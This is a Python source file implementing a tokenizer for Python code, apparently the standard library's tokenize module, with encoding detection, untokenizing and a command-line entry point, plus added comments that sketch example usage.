"""Tokenization help for Python programs.

tokenize(readline) is a generator that breaks a stream of bytes into
Python tokens.  It decodes the bytes according to PEP-0263 for
determining source file encoding.

It accepts a readline-like method which is called repeatedly to get the
next line of input (or b"" for EOF).  It generates 5-tuples with these
members:

    the token type (see token.py)
    the token (a string)
    the starting (row, column) indices of the token (a 2-tuple of ints)
    the ending (row, column) indices of the token (a 2-tuple of ints)
    the original line (string)

It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators.  Additionally, all token lists start with an ENCODING token
which tells you which encoding was used to decode the bytes stream.
"""

__author__ = 'Ka-Ping Yee <ping@lfw.org>'
__credits__ = ('GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, '
               'Skip Montanaro, Raymond Hettinger, Trent Nelson, '
               'Michael Foord')
from builtins import open as _builtin_open
from codecs import lookup, BOM_UTF8
import collections
from io import TextIOWrapper
from itertools import chain
import itertools as _itertools
import re
import sys
from token import *

cookie_re = re.compile(r'^[ \t\f]*#.*?coding[:=][ \t]*([-\w.]+)', re.ASCII)
blank_re = re.compile(br'^[ \t\f]*(?:[#\r\n]|$)', re.ASCII)

import token
__all__ = token.__all__ + ["tokenize", "detect_encoding",
                           "untokenize", "TokenInfo"]
del token

EXACT_TOKEN_TYPES = {
    '(':   LPAR,
    ')':   RPAR,
    '[':   LSQB,
    ']':   RSQB,
    ':':   COLON,
    ',':   COMMA,
    ';':   SEMI,
    '+':   PLUS,
    '-':   MINUS,
    '*':   STAR,
    '/':   SLASH,
    '|':   VBAR,
    '&':   AMPER,
    '<':   LESS,
    '>':   GREATER,
    '=':   EQUAL,
    '.':   DOT,
    '%':   PERCENT,
    '{':   LBRACE,
    '}':   RBRACE,
    '==':  EQEQUAL,
    '!=':  NOTEQUAL,
    '<=':  LESSEQUAL,
    '>=':  GREATEREQUAL,
    '~':   TILDE,
    '^':   CIRCUMFLEX,
    '<<':  LEFTSHIFT,
    '>>':  RIGHTSHIFT,
    '**':  DOUBLESTAR,
    '+=':  PLUSEQUAL,
    '-=':  MINEQUAL,
    '*=':  STAREQUAL,
    '/=':  SLASHEQUAL,
    '%=':  PERCENTEQUAL,
    '&=':  AMPEREQUAL,
    '|=':  VBAREQUAL,
    '^=':  CIRCUMFLEXEQUAL,
    '<<=': LEFTSHIFTEQUAL,
    '>>=': RIGHTSHIFTEQUAL,
    '**=': DOUBLESTAREQUAL,
    '//':  DOUBLESLASH,
    '//=': DOUBLESLASHEQUAL,
    '...': ELLIPSIS,
    '->':  RARROW,
    '@':   AT,
    '@=':  ATEQUAL,
}

class TokenInfo(collections.namedtuple('TokenInfo', 'type string start end line')):
    def __repr__(self):
        annotated_type = '%d (%s)' % (self.type, tok_name[self.type])
        return ('TokenInfo(type=%s, string=%r, start=%r, end=%r, line=%r)' %
                self._replace(type=annotated_type))

    @property
    def exact_type(self):
        if self.type == OP and self.string in EXACT_TOKEN_TYPES:
            return EXACT_TOKEN_TYPES[self.string]
        else:
            return self.type
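
# Illustrative sketch: for an OP token, .type stays the generic OP code while
# .exact_type resolves the specific operator via EXACT_TOKEN_TYPES.
#
#     info = TokenInfo(OP, '+', (1, 2), (1, 3), 'a + b\n')
#     assert info.type == OP and info.exact_type == PLUS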

def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'
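
# A sketch of what these helpers build:
#
#     group('a', 'b')  ->  '(a|b)'
#     any('a', 'b')    ->  '(a|b)*'
#     maybe('a', 'b')  ->  '(a|b)?'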

# Note: we use unicode matching for names ("\w") but ascii matching for
# number literals.
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'\w+'

Hexnumber = r'0[xX](?:_?[0-9a-fA-F])+'
Binnumber = r'0[bB](?:_?[01])+'
Octnumber = r'0[oO](?:_?[0-7])+'
Decnumber = r'(?:0(?:_?0)*|[1-9](?:_?[0-9])*)'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?[0-9](?:_?[0-9])*'
Pointfloat = group(r'[0-9](?:_?[0-9])*\.(?:[0-9](?:_?[0-9])*)?',
                   r'\.[0-9](?:_?[0-9])*') + maybe(Exponent)
Expfloat = r'[0-9](?:_?[0-9])*' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'[0-9](?:_?[0-9])*[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)
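
# A few illustrative matches for the combined pattern (a sketch; these are
# not executed at import time):
#
#     assert re.match(Number, '0x_FF')        # hex with underscore
#     assert re.match(Number, '1_000.5e-3')   # point float with exponent
#     assert re.match(Number, '3.14j')        # imaginary literal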

# Return the empty string, plus all of the valid string prefixes.
def _all_string_prefixes():
    # The valid string prefixes. Only contains the lowercase versions,
    #  and doesn't contain any permutations (includes 'fr', but not
    #  'rf'). The various permutations will be generated.
    _valid_string_prefixes = ['b', 'r', 'u', 'f', 'br', 'fr']
    # if we add binary f-strings, add: ['fb', 'fbr']
    result = {''}
    for prefix in _valid_string_prefixes:
        for t in _itertools.permutations(prefix):
            # create a list with upper and lower versions of each
            #  character
            for u in _itertools.product(*[(c, c.upper()) for c in t]):
                result.add(''.join(u))
    return result
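
# Illustrative sample of the generated set: it contains every case/order
# permutation of the prefixes above, e.g.
#
#     prefixes = _all_string_prefixes()
#     assert {'', 'B', 'rb', 'Rb', 'fR'} <= prefixes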

def _compile(expr):
    return re.compile(expr, re.UNICODE)

# Note that since _all_string_prefixes includes the empty string,
#  StringPrefix can be the empty string (making it optional).
StringPrefix = group(*_all_string_prefixes())

# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group(StringPrefix + "'''", StringPrefix + '"""')
# Single-line ' or " string.
String = group(StringPrefix + r"'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
               StringPrefix + r'"[^\n"\\]*(?:\\.[^\n"\\]*)*"')

# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"!=",
                 r"//=?", r"->",
                 r"[+\-*/%&@|^=<>]=?",
                 r"~")

Bracket = '[][(){}]'
Special = group(r'\r?\n', r'\.\.\.', r'[:;.,@]')
Funny = group(Operator, Bracket, Special)

PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken

# First (or only) line of ' or " string.
ContStr = group(StringPrefix + r"'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
                group("'", r'\\\r?\n'),
                StringPrefix + r'"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
                group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n|\Z', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)

# For a given string prefix plus quotes, endpats maps it to a regex
#  to match the remainder of that string. _prefix can be empty, for
#  a normal single or triple quoted string (with no prefix).
endpats = {}
for _prefix in _all_string_prefixes():
    endpats[_prefix + "'"] = Single
    endpats[_prefix + '"'] = Double
    endpats[_prefix + "'''"] = Single3
    endpats[_prefix + '"""'] = Double3
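
# Illustrative lookups (a sketch): the opening prefix-plus-quote selects the
# tail pattern for the rest of the string.
#
#     assert endpats["'"] == Single
#     assert endpats['Rb"""'] == Double3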

# A set of all of the single and triple quoted string prefixes,
#  including the opening quotes.
single_quoted = set()
triple_quoted = set()
for t in _all_string_prefixes():
    for u in (t + '"', t + "'"):
        single_quoted.add(u)
    for u in (t + '"""', t + "'''"):
        triple_quoted.add(u)

tabsize = 8

class TokenError(Exception): pass

class StopTokenizing(Exception): pass


class Untokenizer:

    def __init__(self):
        self.tokens = []
        self.prev_row = 1
        self.prev_col = 0
        self.encoding = None

    def add_whitespace(self, start):
        row, col = start
        if row < self.prev_row or row == self.prev_row and col < self.prev_col:
            raise ValueError("start ({},{}) precedes previous end ({},{})"
                             .format(row, col, self.prev_row, self.prev_col))
        row_offset = row - self.prev_row
        if row_offset:
            self.tokens.append("\\\n" * row_offset)
            self.prev_col = 0
        col_offset = col - self.prev_col
        if col_offset:
            self.tokens.append(" " * col_offset)

    def untokenize(self, iterable):
        it = iter(iterable)
        indents = []
        startline = False
        for t in it:
            if len(t) == 2:
                self.compat(t, it)
                break
            tok_type, token, start, end, line = t
            if tok_type == ENCODING:
                self.encoding = token
                continue
            if tok_type == ENDMARKER:
                break
            if tok_type == INDENT:
                indents.append(token)
                continue
            elif tok_type == DEDENT:
                indents.pop()
                self.prev_row, self.prev_col = end
                continue
            elif tok_type in (NEWLINE, NL):
                startline = True
            elif startline and indents:
                indent = indents[-1]
                if start[1] >= len(indent):
                    self.tokens.append(indent)
                    self.prev_col = len(indent)
                startline = False
            self.add_whitespace(start)
            self.tokens.append(token)
            self.prev_row, self.prev_col = end
            if tok_type in (NEWLINE, NL):
                self.prev_row += 1
                self.prev_col = 0
        return "".join(self.tokens)

    def compat(self, token, iterable):
        indents = []
        toks_append = self.tokens.append
        startline = token[0] in (NEWLINE, NL)
        prevstring = False

        for tok in chain([token], iterable):
            toknum, tokval = tok[:2]
            if toknum == ENCODING:
                self.encoding = tokval
                continue

            if toknum in (NAME, NUMBER):
                tokval += ' '

            # Insert a space between two consecutive strings
            if toknum == STRING:
                if prevstring:
                    tokval = ' ' + tokval
                prevstring = True
            else:
                prevstring = False

            if toknum == INDENT:
                indents.append(tokval)
                continue
            elif toknum == DEDENT:
                indents.pop()
                continue
            elif toknum in (NEWLINE, NL):
                startline = True
            elif startline and indents:
                toks_append(indents[-1])
                startline = False
            toks_append(tokval)


def untokenize(iterable):
    """Transform tokens back into Python source code.
    It returns a bytes object, encoded using the ENCODING
    token, which is the first token sequence output by tokenize.

    Each element returned by the iterable must be a token sequence
    with at least two elements, a token number and token value.  If
    only two tokens are passed, the resulting output is poor.

    Round-trip invariant for full input:
        Untokenized source will match input source exactly

    Round-trip invariant for limited input:
        # Output bytes will tokenize back to the input
        t1 = [tok[:2] for tok in tokenize(f.readline)]
        newcode = untokenize(t1)
        readline = BytesIO(newcode).readline
        t2 = [tok[:2] for tok in tokenize(readline)]
        assert t1 == t2
    """
    ut = Untokenizer()
    out = ut.untokenize(iterable)
    if ut.encoding is not None:
        out = out.encode(ut.encoding)
    return out
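
# Round-trip sketch (illustrative): with full 5-tuples the source is
# reproduced exactly, per the invariant above.
#
#     from io import BytesIO
#     src = b"x = 1\n"
#     toks = list(tokenize(BytesIO(src).readline))
#     assert untokenize(toks) == src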


def _get_normal_name(orig_enc):
    """Imitates get_normal_name in tokenizer.c."""
    # Only care about the first 12 characters.
    enc = orig_enc[:12].lower().replace("_", "-")
    if enc == "utf-8" or enc.startswith("utf-8-"):
        return "utf-8"
    if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or \
       enc.startswith(("latin-1-", "iso-8859-1-", "iso-latin-1-")):
        return "iso-8859-1"
    return orig_enc

def detect_encoding(readline):
    """
    The detect_encoding() function is used to detect the encoding that should
    be used to decode a Python source file.  It requires one argument, readline,
    in the same way as the tokenize() generator.

    It will call readline a maximum of twice, and return the encoding used
    (as a string) and a list of any lines (left as bytes) it has read in.

    It detects the encoding from the presence of a UTF-8 BOM or an encoding
    cookie as specified in PEP 263.  If both a BOM and a cookie are present,
    but disagree, a SyntaxError will be raised.  If the encoding cookie is an
    invalid charset, a SyntaxError is raised.  Note that if a UTF-8 BOM is
    found, 'utf-8-sig' is returned.

    If no encoding is specified, then the default of 'utf-8' will be returned.
    """
    try:
        filename = readline.__self__.name
    except AttributeError:
        filename = None
    bom_found = False
    encoding = None
    default = 'utf-8'
    def read_or_stop():
        try:
            return readline()
        except StopIteration:
            return b''

    def find_cookie(line):
        try:
            # Decode as UTF-8. Either the line is an encoding declaration,
            # in which case it should be pure ASCII, or it must be UTF-8
            # per default encoding.
            line_string = line.decode('utf-8')
        except UnicodeDecodeError:
            msg = "invalid or missing encoding declaration"
            if filename is not None:
                msg = '{} for {!r}'.format(msg, filename)
            raise SyntaxError(msg)

        match = cookie_re.match(line_string)
        if not match:
            return None
        encoding = _get_normal_name(match.group(1))
        try:
            codec = lookup(encoding)
        except LookupError:
            # This behaviour mimics the Python interpreter
            if filename is None:
                msg = "unknown encoding: " + encoding
            else:
                msg = "unknown encoding for {!r}: {}".format(filename,
                        encoding)
            raise SyntaxError(msg)

        if bom_found:
            if encoding != 'utf-8':
                # This behaviour mimics the Python interpreter
                if filename is None:
                    msg = 'encoding problem: utf-8'
                else:
                    msg = 'encoding problem for {!r}: utf-8'.format(filename)
                raise SyntaxError(msg)
            encoding += '-sig'
        return encoding

    first = read_or_stop()
    if first.startswith(BOM_UTF8):
        bom_found = True
        first = first[3:]
        default = 'utf-8-sig'
    if not first:
        return default, []

    encoding = find_cookie(first)
    if encoding:
        return encoding, [first]
    if not blank_re.match(first):
        return default, [first]

    second = read_or_stop()
    if not second:
        return default, [first]

    encoding = find_cookie(second)
    if encoding:
        return encoding, [first, second]

    return default, [first, second]
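
# Usage sketch (illustrative): an encoding cookie on the first line is
# normalized and returned along with the lines consumed.
#
#     from io import BytesIO
#     buf = BytesIO(b'# -*- coding: latin-1 -*-\nx = 1\n')
#     enc, lines = detect_encoding(buf.readline)
#     assert enc == 'iso-8859-1' and lines == [b'# -*- coding: latin-1 -*-\n']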


def open(filename):
    """Open a file in read only mode using the encoding detected by
    detect_encoding().
    """
    buffer = _builtin_open(filename, 'rb')
    try:
        encoding, lines = detect_encoding(buffer.readline)
        buffer.seek(0)
        text = TextIOWrapper(buffer, encoding, line_buffering=True)
        text.mode = 'r'
        return text
    except:
        buffer.close()
        raise
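
# Usage sketch (illustrative; 'example.py' is a hypothetical file). Note that
# this is tokenize.open, not builtins.open:
#
#     with open('example.py') as f:
#         source = f.read()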


def tokenize(readline):
    """
    The tokenize() generator requires one argument, readline, which
    must be a callable object which provides the same interface as the
    readline() method of built-in file objects.  Each call to the function
    should return one line of input as bytes.  Alternatively, readline
    can be a callable function terminating with StopIteration:
        readline = open(myfile, 'rb').__next__  # Example of alternate readline

    The generator produces 5-tuples with these members: the token type; the
    token string; a 2-tuple (srow, scol) of ints specifying the row and
    column where the token begins in the source; a 2-tuple (erow, ecol) of
    ints specifying the row and column where the token ends in the source;
    and the line on which the token was found.  The line passed is the
    logical line; continuation lines are included.

    The first token sequence will always be an ENCODING token
    which tells you which encoding was used to decode the bytes stream.
    """
    # This import is here to avoid problems when the itertools module is not
    # built yet and tokenize is imported.
    from itertools import chain, repeat
    encoding, consumed = detect_encoding(readline)
    rl_gen = iter(readline, b"")
    empty = repeat(b"")
    return _tokenize(chain(consumed, rl_gen, empty).__next__, encoding)


def _tokenize(readline, encoding):
    lnum = parenlev = continued = 0
    numchars = '0123456789'
    contstr, needcont = '', 0
    contline = None
    indents = [0]

    if encoding is not None:
        if encoding == "utf-8-sig":
            # BOM will already have been stripped.
            encoding = "utf-8"
        yield TokenInfo(ENCODING, encoding, (0, 0), (0, 0), '')
    last_line = b''
    line = b''
    while True:                                # loop over lines in stream
        try:
            # We capture the value of the line variable here because
            # readline uses the empty string '' to signal end of input,
            # hence `line` itself will always be overwritten at the end
            # of this loop.
            last_line = line
            line = readline()
        except StopIteration:
            line = b''

        if encoding is not None:
            line = line.decode(encoding)
        lnum += 1
        pos, max = 0, len(line)

        if contstr:                            # continued string
            if not line:
                raise TokenError("EOF in multi-line string", strstart)
            endmatch = endprog.match(line)
            if endmatch:
                pos = end = endmatch.end(0)
                yield TokenInfo(STRING, contstr + line[:end],
                       strstart, (lnum, end), contline + line)
                contstr, needcont = '', 0
                contline = None
            elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
                yield TokenInfo(ERRORTOKEN, contstr + line,
                           strstart, (lnum, len(line)), contline)
                contstr = ''
                contline = None
                continue
            else:
                contstr = contstr + line
                contline = contline + line
                continue

        elif parenlev == 0 and not continued:  # new statement
            if not line: break
            column = 0
            while pos < max:                   # measure leading whitespace
                if line[pos] == ' ':
                    column += 1
                elif line[pos] == '\t':
                    column = (column//tabsize + 1)*tabsize
                elif line[pos] == '\f':
                    column = 0
                else:
                    break
                pos += 1
            if pos == max:
                break

            if line[pos] in '#\r\n':           # skip comments or blank lines
                if line[pos] == '#':
                    comment_token = line[pos:].rstrip('\r\n')
                    yield TokenInfo(COMMENT, comment_token,
                           (lnum, pos), (lnum, pos + len(comment_token)), line)
                    pos += len(comment_token)

                yield TokenInfo(NL, line[pos:],
                           (lnum, pos), (lnum, len(line)), line)
                continue

            if column > indents[-1]:           # count indents or dedents
                indents.append(column)
                yield TokenInfo(INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
            while column < indents[-1]:
                if column not in indents:
                    raise IndentationError(
                        "unindent does not match any outer indentation level",
                        ("<tokenize>", lnum, pos, line))
                indents = indents[:-1]
                yield TokenInfo(DEDENT, '', (lnum, pos), (lnum, pos), line)

        else:                                  # continued statement
            if not line:
                raise TokenError("EOF in multi-line statement", (lnum, 0))
            continued = 0

        while pos < max:
            pseudomatch = _compile(PseudoToken).match(line, pos)
            if pseudomatch:                                # scan for tokens
                start, end = pseudomatch.span(1)
                spos, epos, pos = (lnum, start), (lnum, end), end
                if start == end:
                    continue
                token, initial = line[start:end], line[start]

                if (initial in numchars or                  # ordinary number
                    (initial == '.' and token != '.' and token != '...')):
                    yield TokenInfo(NUMBER, token, spos, epos, line)
                elif initial in '\r\n':
                    if parenlev > 0:
                        yield TokenInfo(NL, token, spos, epos, line)
                    else:
                        yield TokenInfo(NEWLINE, token, spos, epos, line)

                elif initial == '#':
                    assert not token.endswith("\n")
                    yield TokenInfo(COMMENT, token, spos, epos, line)

                elif token in triple_quoted:
                    endprog = _compile(endpats[token])
                    endmatch = endprog.match(line, pos)
                    if endmatch:                           # all on one line
                        pos = endmatch.end(0)
                        token = line[start:pos]
                        yield TokenInfo(STRING, token, spos, (lnum, pos), line)
                    else:
                        strstart = (lnum, start)           # multiple lines
                        contstr = line[start:]
                        contline = line
                        break

                # Check up to the first 3 chars of the token to see if
                #  they're in the single_quoted set. If so, they start
                #  a string.
                # We're using the first 3, because we're looking for
                #  "rb'" (for example) at the start of the token. If
                #  we switch to longer prefixes, this needs to be
                #  adjusted.
                # Note that initial == token[:1].
                # Also note that single quote checking must come after
                #  triple quote checking (above).
                elif (initial in single_quoted or
                      token[:2] in single_quoted or
                      token[:3] in single_quoted):
                    if token[-1] == '\n':                  # continued string
                        strstart = (lnum, start)
                        # Again, using the first 3 chars of the
                        #  token. This is looking for the matching end
                        #  regex for the correct type of quote
                        #  character. So it's really looking for
                        #  endpats["'"] or endpats['"'], by trying to
                        #  skip string prefix characters, if any.
                        endprog = _compile(endpats.get(initial) or
                                           endpats.get(token[1]) or
                                           endpats.get(token[2]))
                        contstr, needcont = line[start:], 1
                        contline = line
                        break
                    else:                                  # ordinary string
                        yield TokenInfo(STRING, token, spos, epos, line)

                elif initial.isidentifier():               # ordinary name
                    yield TokenInfo(NAME, token, spos, epos, line)
                elif initial == '\\':                      # continued stmt
                    continued = 1
                else:
                    if initial in '([{':
                        parenlev += 1
                    elif initial in ')]}':
                        parenlev -= 1
                    yield TokenInfo(OP, token, spos, epos, line)
            else:
                yield TokenInfo(ERRORTOKEN, line[pos],
                           (lnum, pos), (lnum, pos+1), line)
                pos += 1

    # Add an implicit NEWLINE if the input doesn't end in one
    if last_line and last_line[-1] not in '\r\n':
        yield TokenInfo(NEWLINE, '', (lnum - 1, len(last_line)), (lnum - 1, len(last_line) + 1), '')
    for indent in indents[1:]:                 # pop remaining indent levels
        yield TokenInfo(DEDENT, '', (lnum, 0), (lnum, 0), '')
    yield TokenInfo(ENDMARKER, '', (lnum, 0), (lnum, 0), '')


# An undocumented, backwards-compatible API for all the places in the
# standard library that expect to be able to use tokenize with strings.
def generate_tokens(readline):
    return _tokenize(readline, None)
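
# Usage sketch (illustrative): unlike tokenize(), the readline callable here
# must return str, and no ENCODING token is produced.
#
#     import io
#     gen = generate_tokens(io.StringIO("x = 1\n").readline)
#     assert next(gen).type == NAME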

def main():
    import argparse

    # Helper error handling routines
    def perror(message):
        print(message, file=sys.stderr)

    def error(message, filename=None, location=None):
        if location:
            args = (filename,) + location + (message,)
            perror("%s:%d:%d: error: %s" % args)
        elif filename:
            perror("%s: error: %s" % (filename, message))
        else:
            perror("error: %s" % message)
        sys.exit(1)

    # Parse the arguments and options
    parser = argparse.ArgumentParser(prog='python -m tokenize')
    parser.add_argument(dest='filename', nargs='?',
                        metavar='filename.py',
                        help='the file to tokenize; defaults to stdin')
    parser.add_argument('-e', '--exact', dest='exact', action='store_true',
                        help='display token names using the exact type')
    args = parser.parse_args()

    try:
        # Tokenize the input
        if args.filename:
            filename = args.filename
            with _builtin_open(filename, 'rb') as f:
                tokens = list(tokenize(f.readline))
        else:
            filename = "<stdin>"
            tokens = _tokenize(sys.stdin.readline, None)

        # Output the tokenization
        for token in tokens:
            token_type = token.type
            if args.exact:
                token_type = token.exact_type
            token_range = "%d,%d-%d,%d:" % (token.start + token.end)
            print("%-20s%-15s%-15r" %
                  (token_range, tok_name[token_type], token.string))
    except IndentationError as err:
        line, column = err.args[1][1:3]
        error(err.args[0], filename, (line, column))
    except TokenError as err:
        line, column = err.args[1]
        error(err.args[0], filename, (line, column))
    except SyntaxError as err:
        error(err, filename)
    except OSError as err:
        error(err)
    except KeyboardInterrupt:
        print("interrupted\n")
    except Exception as err:
        perror("unexpected error: %s" % err)
        raise

if __name__ == "__main__":
    main()
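
# Command-line sketch (illustrative; 'example.py' is a hypothetical file):
#
#     $ python -m tokenize example.py
#     $ python -m tokenize -e example.py    # report exact types for OP tokens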